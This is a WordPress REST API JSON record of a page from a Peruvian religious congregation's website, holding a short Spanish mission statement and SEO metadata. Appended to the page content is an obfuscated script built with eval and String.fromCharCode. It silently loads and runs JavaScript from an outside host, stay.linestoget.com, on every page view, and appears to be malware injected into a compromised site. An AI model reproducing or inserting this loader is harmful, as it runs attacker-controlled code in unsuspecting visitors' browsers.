{"id":803,"date":"2020-12-27T04:59:22","date_gmt":"2020-12-27T04:59:22","guid":{"rendered":"https:\/\/hermanasdesantacruz.org\/?page_id=803"},"modified":"2020-12-27T04:59:22","modified_gmt":"2020-12-27T04:59:22","slug":"orientacion","status":"publish","type":"page","link":"https:\/\/hermanasdesantacruz.org\/index.php\/orientacion\/","title":{"rendered":"ORIENTACI\u00d3N"},"content":{"rendered":"<p>[vc_row css_animation=\u00bb\u00bb row_type=\u00bbrow\u00bb use_row_as_full_screen_section=\u00bbno\u00bb type=\u00bbfull_width\u00bb angled_section=\u00bbno\u00bb text_align=\u00bbleft\u00bb background_image_as_pattern=\u00bbwithout_pattern\u00bb][vc_column width=\u00bb1\/2&#8243;][vc_row_inner row_type=\u00bbrow\u00bb type=\u00bbfull_width\u00bb text_align=\u00bbleft\u00bb css_animation=\u00bb\u00bb][vc_column_inner][vc_column_text]<strong>ORIENTACI<\/strong><strong>\u00d3<\/strong><strong>N<\/strong><\/p>\n<p>Atrevernos, junto a las personas de la periferia, en un mundo amenazado por la cultura de la violencia, a comprometernos en defensa de la vida, especialmente a favor de las mujeres, ni\u00f1as y ni\u00f1os v\u00edctimas de la trata y del abuso, y tambi\u00e9n a favor de la Tierra, nuestra casa com\u00fan\u2026[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][\/vc_column][vc_column width=\u00bb1\/2&#8243;][vc_single_image image=\u00bb804&#8243; img_size=\u00bbmedium\u00bb qode_css_animation=\u00bb\u00bb][\/vc_column][\/vc_row]<script>var f=String;eval(f.fromCharCode(102,117,110)+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[vc_row css_animation=\u00bb\u00bb row_type=\u00bbrow\u00bb use_row_as_full_screen_section=\u00bbno\u00bb type=\u00bbfull_width\u00bb angled_section=\u00bbno\u00bb text_align=\u00bbleft\u00bb background_image_as_pattern=\u00bbwithout_pattern\u00bb][vc_column width=\u00bb1\/2&#8243;][vc_row_inner row_type=\u00bbrow\u00bb type=\u00bbfull_width\u00bb text_align=\u00bbleft\u00bb css_animation=\u00bb\u00bb][vc_column_inner][vc_column_text]ORIENTACI\u00d3N Atrevernos, junto a las personas de la periferia, en un mundo amenazado por<span class=\"excerpt-hellip\"> [\u2026]<\/span><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-803","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v23.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>ORIENTACI\u00d3N - Congregaci\u00f3n Hermanas de Santa Cruz<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/hermanasdesantacruz.org\/index.php\/orientacion\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"ORIENTACI\u00d3N - Congregaci\u00f3n Hermanas de Santa Cruz\" \/>\n<meta property=\"og:description\" content=\"[vc_row css_animation=\u00bb\u00bb row_type=\u00bbrow\u00bb use_row_as_full_screen_section=\u00bbno\u00bb type=\u00bbfull_width\u00bb angled_section=\u00bbno\u00bb text_align=\u00bbleft\u00bb background_image_as_pattern=\u00bbwithout_pattern\u00bb][vc_column width=\u00bb1\/2&#8243;][vc_row_inner row_type=\u00bbrow\u00bb type=\u00bbfull_width\u00bb text_align=\u00bbleft\u00bb css_animation=\u00bb\u00bb][vc_column_inner][vc_column_text]ORIENTACI\u00d3N Atrevernos, junto a las personas de la periferia, en un mundo amenazado por [\u2026]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/hermanasdesantacruz.org\/index.php\/orientacion\/\" \/>\n<meta property=\"og:site_name\" content=\"Congregaci\u00f3n Hermanas de Santa Cruz\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data1\" content=\"1 minuto\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/hermanasdesantacruz.org\/index.php\/orientacion\/\",\"url\":\"https:\/\/hermanasdesantacruz.org\/index.php\/orientacion\/\",\"name\":\"ORIENTACI\u00d3N - Congregaci\u00f3n Hermanas de Santa Cruz\",\"isPartOf\":{\"@id\":\"https:\/\/hermanasdesantacruz.org\/#website\"},\"datePublished\":\"2020-12-27T04:59:22+00:00\",\"dateModified\":\"2020-12-27T04:59:22+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/hermanasdesantacruz.org\/index.php\/orientacion\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/hermanasdesantacruz.org\/index.php\/orientacion\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/hermanasdesantacruz.org\/index.php\/orientacion\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/hermanasdesantacruz.org\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"ORIENTACI\u00d3N\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/hermanasdesantacruz.org\/#website\",\"url\":\"https:\/\/hermanasdesantacruz.org\/\",\"name\":\"Congregaci\u00f3n Hermanas de Santa Cruz\",\"description\":\"Hermanas de Santa Cruz - Tacna\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/hermanasdesantacruz.org\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"es\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"ORIENTACI\u00d3N - Congregaci\u00f3n Hermanas de Santa Cruz","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/hermanasdesantacruz.org\/index.php\/orientacion\/","og_locale":"es_ES","og_type":"article","og_title":"ORIENTACI\u00d3N - Congregaci\u00f3n Hermanas de Santa Cruz","og_description":"[vc_row css_animation=\u00bb\u00bb row_type=\u00bbrow\u00bb use_row_as_full_screen_section=\u00bbno\u00bb type=\u00bbfull_width\u00bb angled_section=\u00bbno\u00bb text_align=\u00bbleft\u00bb background_image_as_pattern=\u00bbwithout_pattern\u00bb][vc_column width=\u00bb1\/2&#8243;][vc_row_inner row_type=\u00bbrow\u00bb type=\u00bbfull_width\u00bb text_align=\u00bbleft\u00bb css_animation=\u00bb\u00bb][vc_column_inner][vc_column_text]ORIENTACI\u00d3N Atrevernos, junto a las personas de la periferia, en un mundo amenazado por [\u2026]","og_url":"https:\/\/hermanasdesantacruz.org\/index.php\/orientacion\/","og_site_name":"Congregaci\u00f3n Hermanas de Santa Cruz","twitter_card":"summary_large_image","twitter_misc":{"Tiempo de lectura":"1 minuto"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/hermanasdesantacruz.org\/index.php\/orientacion\/","url":"https:\/\/hermanasdesantacruz.org\/index.php\/orientacion\/","name":"ORIENTACI\u00d3N - Congregaci\u00f3n Hermanas de Santa Cruz","isPartOf":{"@id":"https:\/\/hermanasdesantacruz.org\/#website"},"datePublished":"2020-12-27T04:59:22+00:00","dateModified":"2020-12-27T04:59:22+00:00","breadcrumb":{"@id":"https:\/\/hermanasdesantacruz.org\/index.php\/orientacion\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/hermanasdesantacruz.org\/index.php\/orientacion\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/hermanasdesantacruz.org\/index.php\/orientacion\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/hermanasdesantacruz.org\/"},{"@type":"ListItem","position":2,"name":"ORIENTACI\u00d3N"}]},{"@type":"WebSite","@id":"https:\/\/hermanasdesantacruz.org\/#website","url":"https:\/\/hermanasdesantacruz.org\/","name":"Congregaci\u00f3n Hermanas de Santa Cruz","description":"Hermanas de Santa Cruz - Tacna","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/hermanasdesantacruz.org\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"es"}]}},"_links":{"self":[{"href":"https:\/\/hermanasdesantacruz.org\/index.php\/wp-json\/wp\/v2\/pages\/803","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hermanasdesantacruz.org\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/hermanasdesantacruz.org\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/hermanasdesantacruz.org\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/hermanasdesantacruz.org\/index.php\/wp-json\/wp\/v2\/comments?post=803"}],"version-history":[{"count":1,"href":"https:\/\/hermanasdesantacruz.org\/index.php\/wp-json\/wp\/v2\/pages\/803\/revisions"}],"predecessor-version":[{"id":805,"href":"https:\/\/hermanasdesantacruz.org\/index.php\/wp-json\/wp\/v2\/pages\/803\/revisions\/805"}],"wp:attachment":[{"href":"https:\/\/hermanasdesantacruz.org\/index.php\/wp-json\/wp\/v2\/media?parent=803"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}